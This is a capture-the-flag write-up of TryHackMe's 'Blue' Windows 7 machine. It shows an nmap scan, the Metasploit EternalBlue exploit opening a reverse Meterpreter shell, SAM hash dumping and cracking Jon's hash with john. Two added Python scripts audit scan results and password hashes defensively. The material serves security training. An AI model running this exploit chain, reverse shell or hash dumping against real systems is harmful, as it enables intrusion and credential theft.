Blue is the second machine in TryHackMe’s “Offensive pentesting” path.
Enumeration
We will start with an nmap scan of the target:
nmap -sV -vv --script vuln 10.10.221.153
PORT STATE SERVICE REASON VERSION
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open ssl/ms-wbt-server? syn-ack
49152/tcp open msrpc syn-ack Microsoft Windows RPC
49153/tcp open msrpc syn-ack Microsoft Windows RPC
49154/tcp open msrpc syn-ack Microsoft Windows RPC
49158/tcp open msrpc syn-ack Microsoft Windows RPC
49159/tcp open msrpc syn-ack Microsoft Windows RPC
Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_ https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
This machine is vulnerable to the smb-vuln-ms17-010 exploit, known in the media as EternalBlue. It can be done without Metasploit, of course, but it will be time-consuming. I’ll probably describe the non-Metasploit method next time.
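Reading the script verdicts off a scan like this by eye is fine for one host, but across a subnet you want the three outcomes kept apart: a positive VULNERABLE state, an explicit negative (smb-vuln-ms10-054 prints false), and checks that returned NT_STATUS_ACCESS_DENIED, which never actually ran and need an authenticated rescan before anyone marks them as clean. The script below is an added example, not part of the original writeup: it parses the host-script block of nmap's normal output and sorts the results into a patch-now list and a re-check list. The sample input is constructed from the scan above with nmap's indentation restored; the function names are my own.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample: the host-script section of the scan above, with nmap's own
# indentation restored (the writeup's copy had the leading spaces collapsed).
SAMPLE = """\
Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|       servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
"""

@dataclass
class ScriptResult:
    script: str
    state: str                    # VULNERABLE / NOT VULNERABLE / INCONCLUSIVE / UNKNOWN
    cves: List[str] = field(default_factory=list)
    risk: str = ""
    error: str = ""               # status the script printed instead of a verdict

def parse_host_scripts(text: str) -> List[ScriptResult]:
    """Parse the 'Host script results' block of nmap's normal (-oN / stdout) output."""
    results: List[ScriptResult] = []
    current: Optional[ScriptResult] = None
    for line in text.splitlines():
        if not line.startswith("|"):
            continue
        raw = line[1:]
        if raw.startswith("_"):            # '|_' marks a script's last output line
            raw = raw[1:]
        indent = len(raw) - len(raw.lstrip(" "))
        body = raw.strip()
        if not body:
            continue
        if indent <= 1:                    # script header: '|_name: verdict' or '| name:'
            name, _, value = body.partition(":")
            value = value.strip()
            if value == "":
                current = ScriptResult(name, "UNKNOWN")      # verdict follows in nested lines
            elif value == "false":
                current = ScriptResult(name, "NOT VULNERABLE")
            else:                          # e.g. NT_STATUS_ACCESS_DENIED: the check never ran
                current = ScriptResult(name, "INCONCLUSIVE", error=value)
            results.append(current)
            continue
        if current is None:
            continue
        key, _, value = body.partition(":")
        key, value = key.strip(), value.strip()
        if key == "State":
            current.state = value
        elif key == "IDs":
            current.cves.extend(re.findall(r"CVE-\d{4}-\d{4,}", value))
        elif key == "Risk factor":
            current.risk = value
    return results

def needs_patch(results: List[ScriptResult]) -> List[ScriptResult]:
    """Scripts that positively confirmed a vulnerability."""
    return [r for r in results if r.state.upper().startswith("VULNERABLE")]

def needs_followup(results: List[ScriptResult]) -> List[ScriptResult]:
    """Checks that could not run unauthenticated; rerun with credentials before closing them."""
    return [r for r in results if r.state == "INCONCLUSIVE"]

if __name__ == "__main__":
    results = parse_host_scripts(SAMPLE)
    for r in needs_patch(results):
        print(f"PATCH NOW  {r.script} {r.cves} risk={r.risk}")
    for r in needs_followup(results):
        print(f"RE-CHECK   {r.script} ({r.error})")
```

Run it against a saved scan (nmap -oN) instead of the embedded sample and the access-denied entries are the ones most often mis-filed as "not vulnerable" in a vulnerability tracker.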
Exploitation
Run Metasploit:
msfconsole
=[ metasploit v5.0.101-dev ]
+ -- --=[ 2049 exploits - 1108 auxiliary - 344 post ]
+ -- --=[ 596 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]
Metasploit tip: Adapter names can be used for IP params set LHOST eth0
Set up the exploit:
msf5 > use windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.62.28
RHOSTS => 10.10.62.28
msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST tun0
LHOST => tun0
It should be fine as it is, but you might also need to change the LPORT. Hit run:
msf5 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 10.11.19.53:1337
[*] 10.10.62.28:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.62.28:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.62.28:445 - Scanned 1 of 1 hosts (100% complete)
[*] 10.10.62.28:445 - Connecting to target for exploitation.
[+] 10.10.62.28:445 - Connection established for exploitation.
[+] 10.10.62.28:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.62.28:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.62.28:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.10.62.28:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.10.62.28:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.10.62.28:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.62.28:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.62.28:445 - Sending all but last fragment of exploit packet
[*] 10.10.62.28:445 - Starting non-paged pool grooming
[+] 10.10.62.28:445 - Sending SMBv2 buffers
[+] 10.10.62.28:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.62.28:445 - Sending final SMBv2 buffers.
[*] 10.10.62.28:445 - Sending last fragment of exploit packet!
[*] 10.10.62.28:445 - Receiving response from exploit packet
[+] 10.10.62.28:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.62.28:445 - Sending egg to corrupted connection.
[*] 10.10.62.28:445 - Triggering free of corrupted buffer.
[*] Sending stage (201283 bytes) to 10.10.62.28
[*] Meterpreter session 1 opened (10.11.19.53:1337 -> 10.10.62.28:49170) at 2020-10-08 10:25:32 -0400
[+] 10.10.62.28:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.62.28:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.62.28:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : JON-PC
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 0
Meterpreter : x64/windows
The process of migrating the shell is well described in the official material, but I didn’t have any issue with the shell as it is.
Post Exploitation
As the shell is already running as NT AUTHORITY\SYSTEM, we don’t need to do a PrivEsc. However, you might collect some useful data from the compromised machine. Most OSCP lab machines have something juicy to find once you become root. Don’t skip the enumeration! To grab the users' hashes, we can use the hashdump command:
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
We have a hash now! Let’s crack it. Save the hash into a file (jon.hash in my case) and crack it with john:
/usr/sbin/john -w=/usr/share/wordlists/rockyou.txt --format=NT ./jon.hash
Yay! We have Jon’s password now.
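A note on what john's --format=NT is actually working on, as an added example that is not part of the original post: an NT hash is MD4 over the UTF-16LE encoding of the password, with no salt. That is why 31d6cfe0d16ae931b73c59d7e0c089c0 on the Administrator and Guest lines above is recognisable on sight as the hash of the empty string (no password set; on a default Windows 7 install both accounts are disabled), and why aad3b435b51404eeaad3b435b51404ee in the LM column means LM hashes are no longer being stored. The script below implements MD4 in pure Python (hashlib's md4 is often unavailable under OpenSSL 3) and runs the kind of audit a defender would run over a hashdump listing: blank passwords, stored LM hashes, accounts sharing a password, and hits on a policy deny list. The hashdump lines are the ones from the writeup; the deny-list words and all function names are my own assumptions.

```python
import struct
from typing import Dict, Iterable, List

MASK = 0xFFFFFFFF

def _lrot(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & MASK

def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 in pure Python (hashlib's 'md4' is often missing under OpenSSL 3)."""
    msg = bytearray(data) + b"\x80"                 # padding: 0x80, zeros, 64-bit LE bit length
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", (8 * len(data)) & 0xFFFFFFFFFFFFFFFF)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (  # (boolean function, message-word order, per-step shifts, round constant)
        (lambda x, y, z: (x & y) | (~x & z), list(range(16)), (3, 7, 11, 19), 0),
        (lambda x, y, z: (x & y) | (x & z) | (y & z),
         [(i % 4) * 4 + i // 4 for i in range(16)], (3, 5, 9, 13), 0x5A827999),
        (lambda x, y, z: x ^ y ^ z,
         [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15), 0x6ED9EBA1),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        r = state[:]
        for fn, order, shifts, k in rounds:
            for i in range(16):   # registers rotate a -> d -> c -> b each step
                a, b, c, d = r[-i % 4], r[(1 - i) % 4], r[(2 - i) % 4], r[(3 - i) % 4]
                r[-i % 4] = _lrot((a + fn(b, c, d) + X[order[i]] + k) & MASK, shifts[i % 4])
        state = [(s + t) & MASK for s, t in zip(state, r)]
    return struct.pack("<4I", *state)

def nt_hash(password: str) -> str:
    """NT hash = MD4(UTF-16LE(password)); no salt, so equal passwords give equal hashes."""
    return md4(password.encode("utf-16-le")).hex()

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of "": LM storage is disabled
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of "": no password set

def parse_hashdump(text: str) -> List[dict]:
    """Parse 'user:rid:lm:nt:::' lines as printed by meterpreter's hashdump."""
    accounts = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        accounts.append({"user": parts[0], "rid": int(parts[1]),
                         "lm": parts[2].lower(), "nt": parts[3].lower()})
    return accounts

def audit(text: str, deny_list: Iterable[str] = ()) -> Dict[str, List[str]]:
    """Per-account findings a password audit would report."""
    deny_hashes = {nt_hash(p): p for p in deny_list}
    first_seen: Dict[str, str] = {}
    findings: Dict[str, List[str]] = {}
    for acct in parse_hashdump(text):
        notes = []
        if acct["lm"] != EMPTY_LM:
            notes.append("LM hash stored (legacy, trivially recoverable)")
        if acct["nt"] == EMPTY_NT:
            notes.append("blank password (no password set)")
        elif acct["nt"] in deny_hashes:
            notes.append("password is on the policy deny list: " + deny_hashes[acct["nt"]])
        if acct["nt"] != EMPTY_NT and acct["nt"] in first_seen:
            notes.append("shares a password with " + first_seen[acct["nt"]])
        first_seen.setdefault(acct["nt"], acct["user"])
        findings[acct["user"]] = notes
    return findings

# The hashdump lines from the writeup; the deny list is a constructed, assumed policy list.
HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
"""
DENY_LIST = ["Password1", "Welcome1", "Summer2020"]

if __name__ == "__main__":
    assert nt_hash("") == EMPTY_NT        # sanity check against the value seen in hashdump
    for user, notes in audit(HASHDUMP, DENY_LIST).items():
        print(f"{user}: {'; '.join(notes) or 'no findings'}")
```

The lack of a salt is the detail worth remembering from the defender's side: two accounts with the same password show the same NT hash, so a single leaked hash list exposes every reuse at a glance, and a deny list only needs to be hashed once to be checked against every account.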
Capturing flags
Well, the exercise explicitly asks you to submit flags, but don’t think of them as CTF flags. A flag in a good CTF is located in a place you can’t reach without going the extra mile. There are three flags on this machine, and they are placed in quite sensitive places:
- C:/
- C:/Windows/System32/config/
- C:/Users/Jon/Documents
That makes sense. System32/config/ is where the SAM files are located, Jon is the admin, so something helpful might be found in the Documents folder, etc.
Takeaway
Exploits rarely work fine out of the box. You might need a lot of patience to make it work sometimes.
Not all exploits (especially if we’re talking about kernel exploits) are stable. You might need to restart this box a bunch of times.
Metasploit doesn’t always mean that your exploitation phase will go smoothly. The post-exploitation phase is important.